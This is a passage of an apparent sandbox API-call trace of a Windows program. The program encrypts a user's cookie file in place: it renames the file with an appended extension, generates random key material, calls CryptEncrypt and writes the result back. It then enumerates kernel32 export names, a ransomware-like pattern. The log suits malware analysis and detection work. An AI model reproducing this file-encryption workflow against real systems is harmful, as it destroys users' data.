HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb" [0181.956] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.956] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agh7ohb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.957] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=372) returned 1 [0181.957] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.957] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.957] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0181.957] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0181.957] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.958] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0181.958] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0181.958] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.958] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.959] CloseHandle (hObject=0x288) returned 1 [0181.959] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.959] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0181.960] CloseHandle (hObject=0x0) returned 0 [0181.960] CloseHandle (hObject=0x284) returned 1 [0181.960] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.960] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.960] GetTickCount () returned 0x1134e11 [0181.960] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.960] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0181.961] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0181.961] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.961] lstrlenA (lpString="kernel32.dll") returned 12 [0181.961] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0181.961] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0181.961] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0181.961] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0181.961] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0181.961] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0181.961] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0181.961] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0181.961] lstrlenA (lpString="ADDATOMA") returned 8 [0181.961] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0181.961] lstrlenA (lpString="ADDATOMW") returned 8 [0181.961] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0181.961] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0181.961] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0181.962] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0181.962] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0181.962] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0181.962] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0181.962] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0181.962] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0181.962] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0181.962] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0181.962] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0181.962] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0181.962] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0181.962] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0181.962] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0181.962] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0181.962] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0181.962] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0181.962] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0181.962] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0181.962] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0181.962] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0181.962] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0181.962] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0181.962] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0181.962] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0181.962] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0181.962] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0181.962] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0181.962] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0181.962] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0181.962] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0181.962] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0181.962] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0181.962] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0181.962] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0181.962] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0181.962] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0181.963] lstrlenA (lpString="BACKUPREAD") returned 10 [0181.963] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0181.963] lstrlenA (lpString="BACKUPSEEK") returned 10 [0181.963] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0181.963] lstrlenA (lpString="BACKUPWRITE") returned 11 [0181.963] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0181.963] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0181.963] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0181.963] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0181.963] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0181.963] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0181.963] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0181.963] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0181.963] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0181.963] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0181.963] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0181.963] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0181.963] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0181.963] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0181.963] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0181.963] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0181.963] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0181.963] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0181.963] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0181.963] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0181.963] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0181.963] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0181.963] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0181.963] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0181.963] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0181.963] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0181.963] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0181.963] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0181.963] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0181.963] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0181.963] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0181.963] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0181.964] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0181.964] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0181.964] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0181.964] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0181.964] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0181.964] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0181.964] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0181.964] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0181.964] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0181.964] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0181.964] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0181.964] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0181.964] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0181.964] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0181.964] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0181.964] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0181.964] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0181.964] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0181.964] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0181.964] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0181.964] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0181.964] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0181.964] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0181.964] lstrlenA (lpString="BEEP") returned 4 [0181.964] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0181.964] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0181.964] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0181.964] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0181.964] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0181.964] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0181.964] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0181.964] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0181.964] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0181.964] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0181.964] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0181.965] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0181.965] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0181.965] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0181.965] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0181.965] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0181.965] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0181.965] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0181.965] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0181.965] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0181.965] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0181.965] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0181.965] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0181.965] lstrlenA (lpString="CANCELIO") returned 8 [0181.965] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0181.965] lstrlenA (lpString="CANCELIOEX") returned 10 [0181.965] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0181.965] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0181.965] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0181.965] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0181.965] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0181.965] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0181.965] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0181.965] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0181.965] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0181.965] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0181.965] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0181.965] lstrlenA (lpString="CHECKELEVATION") returned 14 [0181.965] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0181.965] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0181.965] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0181.965] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0181.965] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0181.965] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0181.965] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0181.965] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0181.966] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0181.966] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0181.966] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0181.966] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0181.966] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0181.966] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0181.966] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0181.966] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0181.966] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0181.966] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0181.966] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0181.966] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0181.966] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0181.966] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0181.966] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0181.966] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0181.966] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0181.966] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0181.966] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0181.966] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0181.966] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0181.966] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0181.966] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0181.966] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0181.966] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0181.966] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0181.966] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0181.966] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0181.966] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0181.966] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0181.966] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0181.966] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0181.966] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0181.966] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0181.966] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0181.966] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0181.966] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0181.967] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0181.967] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0181.967] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0181.967] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0181.967] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0181.967] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0181.967] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0181.967] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0181.967] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0181.968] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0181.968] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0181.968] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0181.968] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0181.968] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0181.968] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0181.968] lstrcpyA (in: lpString1=0x36fcbb4, 